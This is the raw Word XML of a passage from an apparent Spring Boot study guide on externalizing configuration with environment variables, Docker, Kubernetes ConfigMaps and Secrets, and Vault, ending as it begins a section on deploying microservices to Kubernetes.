    <w:p w14:paraId="36D3EAB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You can specify environment variables directly or set them in the container orchestration platform (e.g., Kubernetes, Docker Compose).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE04A7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application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09969FB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rl=${DB_URL}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279DE2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username=${DB_USERNAME}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CAAF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datasource.password=${DB_PASSWORD}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047276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Dockerfile (for Docker containers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BEC52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NV DB_URL=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E27E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ENV DB_USERNAME=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CE43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NV DB_PASSWORD=secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BE70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 Kubernetes ConfigMap/Secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AB13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nfigMap Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E45C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v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6D9B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ConfigMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B7B8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756EC46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config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571A5D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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F518A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datasource.url: "jdbc:mysql://localhost:3306/mydb"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBEB04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datasource.username: "root"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E75A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Pod Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707569C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apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367E1C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Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234CFA6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5B2E8E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2410D82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ec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541CD9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tainers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878661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name: my-app-container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF0F9C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image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA884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From:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AEEE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configMapRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ECB97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config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3894BD8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In Kubernetes, you can also use </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for sensitive information like passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3720FC"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649179">
          <v:rect id="_x0000_i2895" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F92796"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4. Using Profiles with Docker and Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70564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You can define environment variables or config maps for each environment (e.g., development, staging, production) in </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AA786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Docker Compose Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA9B8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Define separate docker-compose.yml files for different environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D712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version: '3.7'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A6FE1" w14:textId="77777777" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="000C2889" w:rsidP="000C2889">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE309F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ervices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100233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my-app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D704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image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64787B7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ironment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24E5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RING_PROFILES_ACTIVE: prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B745B1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URL: jdbc:mysql://prod-db:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D6ADA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USERNAME: prod_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD10A5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DB_PASSWORD: prod_pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87165A"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Kubernetes Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72717DF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Create a ConfigMap for each environment (dev, prod, staging), and reference it in your </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows you to separate configurations for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA75E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piVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518ACF0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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55360A4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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535167E"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name: my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ACAB4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ec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34866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replicas: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915310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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06AD1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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B132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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A000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name: my-app-container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002EFB7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image: my-app:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257284B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envFrom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A0A9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 configMapRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A552E3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                name: my-app-config-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB4C14"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DAC05">
          <v:rect id="_x0000_i2896" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4802490C"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5. Spring Cloud Kubernetes for Configuration in Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB92A8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For microservices running in </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a way to externalize configuration directly from Kubernetes ConfigMaps and Secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1365D"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dd Spring Cloud Kubernetes dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF65E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66E519C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7E1A8603"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kubernetes-config&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A940D0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7CC5EEE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Configuration in Kubernetes</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 xml:space="preserve">Spring Cloud Kubernetes will automatically use the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConfigMap</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to configure the application based on its environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B412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Application Properties</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Define your properties in Kubernetes ConfigMap or directly use environment variables to load them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF4D36"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2D0638">
          <v:rect id="_x0000_i2897" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931D482"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6. Vault for Secure Secrets Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2221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For sensitive data, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashiCorp Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage secrets and externalize configuration such as passwords, API keys, etc. This approach is especially useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly secure environments</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D1D1C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Integrate Vault with Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Use Spring Vault to integrate Vault into your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77696C79"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Add dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22734C1B"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3C3B5BE2"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groupId&gt;org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40D02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lt;artifactId&gt;spring-cloud-starter-vault-config&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E6D5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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26348DA6"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In application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AEF3F"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F292AD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vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D439C"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uri: http://vault-server:8200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F798C7"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authentication: TOKEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACF3B8"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 xml:space="preserve">    token: your-vault-token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EA320" w14:textId="77777777" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="000C2889" w:rsidP="000C2889">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Vault can then securely provide configuration values (such as database credentials) to your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494CED5" w14:textId="77777777" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="00000000" w:rsidP="000C28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47A58">
          <v:rect id="_x0000_i2898" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF6A70" w14:textId="77777777" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="000C2889" w:rsidP="000C2889">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F333935"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Externalizing configuration for different environments in Spring Boot microservices can be done through multiple strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B267D0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Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use application.properties and application.yml with Spring profiles for environment-specific configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E970FB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Spring Cloud Config Server</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Centralize configuration in a Git or file-based repository for all microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441E234"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Environment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use environment variables to provide configuration for containerized deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FA3C1"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Kubernetes ConfigMaps and Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Store configuration and sensitive data in Kubernetes and inject them into your microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A0C2A"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Spring Cloud Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Leverage Kubernetes-native solutions for managing configuration in cloud-native environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26017436"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For managing sensitive secrets, integrate Spring Vault to securely access configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D40400" w14:textId="77777777" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="000C2889" w:rsidP="000C2889">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These approaches ensure your microservices can be easily configured for different environments while maintaining separation of concerns and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF93A93"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9CF720">
          <v:rect id="_x0000_i2899" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03490DD8" w14:textId="24A3B0C7" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00957731" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="701" w:name="_Toc197867915"/>
      <w:r w:rsidRPr="00957731">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you orchestrate and deploy multiple Spring Boot microservices together in Production environment using Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="701"/>
    </w:p>
    <w:p w14:paraId="34ECC0B5" w14:textId="015EC575" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00C1570D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Orchestrating and deploying multiple Spring Boot microservices in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>production environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires careful planning for scaling, fault tolerance, service discovery, configuration management, and monitoring. Below are the key steps involved in orchestrating and deploying Spring Boot microservices using Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9ACA1"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lastRenderedPageBreak/>
        <w:t>1. Containerizing Spring Boot Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50844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he first step is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>containerize</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each of your Spring Boot microservices. This allows them to be deployed and run on Kubernetes. You can do this by creating a Dockerfile for each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEEE3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Dockerfile for a Spring Boot Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35487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Use official OpenJDK image as base image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028BAB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FROM openjdk:21-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658FEA00" w14:textId="77777777" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00D11433">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D10F5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Set the working directory in the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E946D5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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32DEF2" w14:textId="77777777" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00D11433">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9FC30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Copy the jar file into the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508D61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COPY target/my-app.jar /app/my-app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F099980" w14:textId="77777777" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00D11433">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
